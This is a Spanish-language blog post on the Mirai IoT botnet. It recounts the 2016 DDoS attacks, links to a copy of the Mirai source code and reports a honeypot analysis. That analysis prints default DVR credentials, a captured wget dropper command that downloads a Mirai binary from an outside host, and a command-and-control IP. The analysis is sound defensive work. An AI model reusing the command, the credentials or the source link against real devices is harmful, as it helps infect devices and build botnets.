#CiberSeguridad – Linux.Mirai

Después de salir la noticia del Linux. Mirai me puse a comprobar algunos de los sistemas que tengo a mano para una prueba de escalabilidad de la vulnerabilidad

Bueno antes de explicarle los resultados de Mirai, miremos el mundo millones de afectados en Estados Unidos y en Europa, un país entero sin conexión a internet y la caída de varios de los principales sitios y servicios online del mundo fueron la carta de presentación de la “botnet” Mirai, un malware que encuentra, infecta y domina dispositivos hogareños para usarlos en ataques. Este hecho marcó un antes y un después en estos incidentes y obliga a fabricantes y gobiernos a elevar las medidas de seguridad.
“Alguien está aprendiendo cómo derribar internet”, alertó a comienzos de septiembre, en su blog, Bruce Schneier, uno de los principales referentes a nivel global sobre seguridad informática. El experto se refería a un incremento en los ataques distribuidos de denegación de servicios (DDoS) contra compañías encargadas de proveer la infraestructura básica que hace que internet funcione.
No daba cuenta de un nuevo tipo de ataque, ya que los DDoS se utilizan desde hace años para dar de baja servidores provocándoles la pérdida de conectividad, al saturarlos mediante una enorme cantidad de accesos que consumen su ancho de banda, los sobrecargan y los voltean. La alarma de Schneier, en cambio, alertaba sobre la magnitud de los mismos. Yo por mi parte fui victima de esos ataques de DDoS en varios de los VPS que uso, aun teniendo un ancho de bando de 10Gb/s estuvo mi sitio www.unicatel.com caído un par de días por dicho ataque.
Su advertencia comenzó a tomar cuerpo ese mismo mes.
El proveedor de hosting francés OVH quedó fuera de la red después de que a sus servidores ingresara un tráfico de casi 1,5 Tb por segundo, donde también tengo algunos de mis VPS, y fue insoportable la caída de los servicios; una semana después, el blog del periodista especializado en seguridad informática Brian Krebs fue blanco de otro enorme ataque de 665 Gb por segundo.
En ambos casos, la novedad residió en que los ataques no provinieron de PC infectadas, sino de Mirai, una botnet -una red de cámaras y otros aparatos hogareños conectados a la internet de las cosas- compuesta por más de 100.000 dispositivos, en la que los hackers aprovecharon vulnerabilidades de seguridad de esos equipos para dirigir su tráfico contra las víctimas.
Después de estos incidentes, un hacker conocido como Anna-senpai abrió el código de esta botnet y lo subió a internet para que cualquier persona que quisiera pudiera usarlo.
“Mirai aprovecha una vulnerabilidad de dispositivos de Linux conectados a internet, en referencia al sistema operativo que tienen muchos de los aparatos de la internet de las cosas; primero escanea todo, prueba y entra en todos los (dispositivos) que son accesibles, a los que infecta y domina”, explicó Alfredo Adrián Ortega, desarrollador de software que trabaja para la empresa de antivirus Avast.
Así, esta botnet crea lo que especialistas denominaron un “ejército zombie de dispositivos conectados”, que permanece latente hasta que se usa para lanzar un ataque.
Como sucedió el 21 de octubre, cuando Mirai se empleó contra los servidores de DyN, un proveedor de direcciones DNS, y volteó durante casi un día entero no solo un gran número de conexiones en Estados Unidos -primero en la costa este, aunque luego se esparció hacia el otro extremo-, sino que afectó a sitios y servicios como Twitter, Netflix, Spotify, Reddit, The Guardian, The New York Times, CNN, Guardian.co.uk, HBO Now, PayPal, Pinterest, Playstation Network, Storify.com, The Verge, Fox News, Soundcloud, WSJ.com, time.com, xbox.com, dailynews.com, BBC, y CNBC.com, entre otros.
Ortega relativizó la advertencia de Schneier al señalar que Mirai “no puede tirar toda internet”, aunque afirmó que “sí puede tirar partes. Y por ahí son partes fundamentales”.
Bueno les comparto el source de Mirai -> https://github.com/armandofelipe1992/mirai-bot

 

Esta interacción utilizaba credenciales no habituales ya que las más recibidas fueron, a diferencia de lo que cabía esperar, xc3511 y vyzxv.

Tras una primera búsqueda no se encontró ninguna referencia a ataques relacionados con estas credenciales pero se dedujo que las credenciales son recurrentes en los dispositivos DVR (Digital Video Recorder) de la marca de origen chino Dahua (por ejemplo el DH-3004). Dahua es el principal proveedor mundial de soluciones de vigilancia, pues según el informe IMS 2015 gozan de la mayor cuota de mercado.

Una vez obtenidos estos datos, se decidió convertir el carácter de baja interacción del honeypot a un perfil de alta interacción habilitando la entrada a aquellos que introdujeran las credenciales. Así pues, se detectó a las pocas horas la entrada, todo parece indicar que automatizada, de un atacante de origen chino (59.69.X.X), la cual no está catalogada como maliciosa por ninguna blacklist.

La rutina elimina ciertos procesos y descarga un archivo desde una IP ucraniana mediante el siguiente comando:

wget http://5.206.X.X:80/bins/mirai.x86 -O - > dvrHelper; /bin/busybox chmod 777 dvrHelper;

Llama la atención el nombre con el que almacena el binario, “dvrHelper”, lo que confirma que el objeto del ataque es el previsto. La IP ucraniana no está, al igual que la originadora del ataque, en ninguna blacklist.

El ejecutable en cuestión se trata de “mirai.x86_655c3cf460489a7d032c37cd5b84a3a8“. En el momento en que fue obtenido, no existía ninguna referencia a éste en virustotal.com, así que lo subimos nosotros. A día de hoy es detectado solo por tres antivirus como una variante del troyano Linux.Gafgyt y de éste sí que hay varias referencias que indican que se trata de un malware dirigido a routers, DVR, Smart Tvs, etc. bastante difícil de detectar.

Tras un análisis rápido del binario se ha detectado que es de tipo ELF para una arquitectura de 32 bits y que crea un backdoor para sistemas CCTV basado en dvrHelper.

img1
Posteriormente se analizó el malware y se ha detectado que el patrón que sigue es el siguiente:

    • Verifica que se encuentra con conexión a Internet mediante conexiones ICMP a IP que conoce y que sabe que están levantados, tambien funciona aunque la IP no este de cara a internet el trafico saliente hacia esos IP
    • Se pone en contacto con una IP de Corea del Sur (115.86.254.212) a nombre de una empresa denominada CJ HelloVision, la cual, tras una combinación de mensajes a través de su puerto TELNET, comienza a enviarle información
    • Contactar con otras IP con TELNET abierto, esta vez intentando infectar a otras máquinas

img4

Así pues, hemos podido comprobar que se trata de un nuevo troyano de la familia ELF Linux/Mirai/Gafgyt/Remaiten el cual infecta equipos DVR para que éstos, una vez infectados, propaguen el binario por otros dispositivos de las mismas características. No hemos sido los únicos a los que les ha llamado la atención este malware, desde “Malware Must Die” también recientemente le han dedicado un detallado artículo sobre su análisis.

Lo curioso del caso es que CJ HelloVision es la compañía de televisión por cable más grande de Corea del Sur. Formalmente conocida como CJ CableNet, fue vendida a SK Group en el 2015, el tercer mayor conglomerado de Corea del Sur, que entre otros, centra su actividad en las Telecomunicaciones.

También en nuevas versiones que han salido después que se publico el código de dicha botnet se han encontrado versiones dockerizada de Honte.

Como vemos el malware contra el IoT cada día se renueva, crece y se sofistica.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

*